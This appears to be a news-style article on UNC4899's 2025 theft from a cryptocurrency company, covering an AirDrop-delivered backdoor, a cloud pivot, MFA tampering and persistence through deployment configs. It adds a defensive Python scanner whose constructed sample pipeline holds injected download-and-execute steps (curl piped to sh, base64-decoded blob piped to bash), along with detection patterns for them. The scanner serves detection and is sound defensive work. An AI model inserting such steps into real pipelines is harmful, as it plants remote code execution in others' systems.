Cybercrime has produced many large digital thefts in the cryptocurrency industry, but the recent activity of a North Korean hacking group marks a further step in the stealth with which attackers gain access to networks. In a carefully planned 2025 attack by UNC4899 against a cryptocurrency company, millions of dollars in digital assets were taken from the organization. The combination of simple social engineering and skilled abuse of cloud services showed that a targeted company can be compromised through the transfer of a single innocuous-looking file, even when its corporate network is otherwise well secured.
The AirDrop Trap
A multi-million dollar heist began with a simple conversation. The attackers approached a developer at the firm they wanted to breach, posing as collaborators on an open-source project, and built credibility with him over time. Eventually they persuaded the developer to download an archive of their project to his workstation. Believing the archive to be legitimate, the developer transferred it from his phone to his corporate workstation using Apple’s AirDrop feature. What he did not know was that the archive carried a hidden malicious payload: a Python program disguised as an ordinary system management tool. That single transfer gave the attackers their initial foothold inside the network perimeter.
Pivoting to the Cloud
Once the malware ran on the developer’s corporate machine, the attackers had a foot in the door, but their real objective lay in the company’s cloud infrastructure. The malicious binaries served as backdoors that let the attackers ride the developer’s authenticated sessions and pivot from the workstation directly into the company’s broader cloud environment. Security researchers at Google Cloud noted that the jump from a personal file transfer to a corporate cloud network represents a dangerous evolution in modern cybercrime.
Rewriting the Security Rules
Inside the company’s cloud environment, the attackers methodically dismantled the existing security controls. Operating within the firm’s infrastructure, UNC4899 used stolen service account tokens to escalate to administrative privileges. They then altered the company’s multi-factor authentication settings so that they could reach accounts without interruption. With those safeguards disabled, the attackers could move into sensitive parts of the environment, including customer production databases and large cryptocurrency holdings. There they found insecurely stored database credentials, which let them reset passwords on high-value accounts at will.
The Automated Backdoor
Keeping access to a system after stealing many millions of dollars takes considerable technical skill. By deliberately targeting the company’s automated development pipelines, the North Korean attackers maintained access to the network by inserting malicious commands into its deployment configurations. Each time a server ran an automated deployment, the company’s own systems unknowingly fetched and installed the attackers’ backdoor. This deep persistence let the attackers covertly manipulate user accounts and drain cryptocurrency funds before their use of those accounts could be detected.
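The two passages above, credentials left in reachable configuration and backdoor commands inserted into deployment configurations, both describe things a defender can look for in the configuration files themselves. The scanner below is an added example written for this article; it is not code from the incident, from UNC4899 or from Google Cloud, and the pipeline it scans is a constructed GitHub Actions-style sample whose hostnames and secret names are made up. It flags three forms of injected download-and-execute steps plus plaintext credentials assigned directly in the config, while letting references to a secret store (`${{ secrets.NAME }}`) or an environment variable pass.

```python
"""Scan a deployment/CI configuration for injected download-and-execute
steps and for credentials committed in plaintext.

Added example for this article: not code from the incident, from UNC4899
or from Google Cloud. The sample pipeline below is constructed; hostnames
and secret names in it are made up.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line number within the scanned text
    rule: str      # short identifier of the rule that matched
    snippet: str   # the offending line, whitespace-stripped


# Each rule is (name, compiled pattern). The patterns are deliberately narrow
# so that routine steps such as `pip install -r requirements.txt` stay quiet.
RULES: list[tuple[str, re.Pattern[str]]] = [
    # Remote script fetched and piped straight into a shell.
    ("remote-pipe-to-shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # Blob decoded at run time and handed to an interpreter: hides the
    # payload from a casual read of the config.
    ("base64-decode-exec",
     re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(sudo\s+)?"
                r"((ba|z|da)?sh|python[23]?|perl)\b")),
    # One-liner interpreter invocation that reaches out to the network.
    ("inline-interpreter-fetch",
     re.compile(r"\bpython[23]?\s+-c\s+.*\b(urllib|requests|socket)\b")),
    # Literal value assigned to a password/secret/token key. A value that
    # starts with `$` is a reference to an env var or secret store and is
    # allowed; the negative lookahead skips those.
    ("plaintext-credential",
     re.compile(r"(?i)(password|passwd|secret|token)\w*\s*[:=]\s*['\"]?"
                r"(?!\$)[^\s'\"]{4,}")),
]


def scan_config(text: str) -> list[Finding]:
    """Return a Finding for every non-comment line that trips a rule."""
    findings: list[Finding] = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and full-line comments execute nothing
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(number, name, line))
    return findings


# Constructed sample: a deployment workflow into which two steps have been
# injected and one database password has been committed as a literal.
SAMPLE_PIPELINE = """\
# Constructed deployment workflow for this example (GitHub Actions-like syntax)
name: deploy-prod
on:
  push:
    branches: [main]
env:
  DB_HOST: db.internal.example
  DB_PASSWORD: "hunter2-prod"          # plaintext secret committed to the repo
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install deps
        run: pip install -r requirements.txt
      - name: Bootstrap tooling
        run: curl -fsSL https://cdn.example.invalid/setup.sh | sh   # injected step
      - name: Deploy
        run: ./deploy.sh --token "${{ secrets.DEPLOY_TOKEN }}"
      - name: Post-deploy hook
        run: echo "$HOOK_BLOB" | base64 -d | bash                 # injected step
"""

if __name__ == "__main__":
    for f in scan_config(SAMPLE_PIPELINE):
        print(f"line {f.line:>3}  {f.rule:<24} {f.snippet}")
```

Run it over every workflow and deployment file in a repository, ideally as a pre-merge check so that a change to a pipeline gets the same review as a change to application code. The rules are intentionally narrow and pattern-based, so a match is a prompt for human review rather than proof of compromise, and a real deployment should replace the plaintext credential with a secret-store reference like the `DEPLOY_TOKEN` line already uses.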
Defending Against the Next Threat
The growth of the crypto industry has drawn state-sponsored hacking groups that use advanced artificial intelligence and sophisticated social engineering to target development teams. Security experts strongly recommend that companies isolate their cloud environments from everyday corporate devices, so that a compromised workstation cannot become a bridge into production. Businesses should also enforce restrictions on peer-to-peer file sharing (for example, no AirDrop in the workplace) and adopt and strictly enforce phishing-resistant authentication. Until the industry adopts a universal standard for secret management, the risk of the next unseen heist remains significant.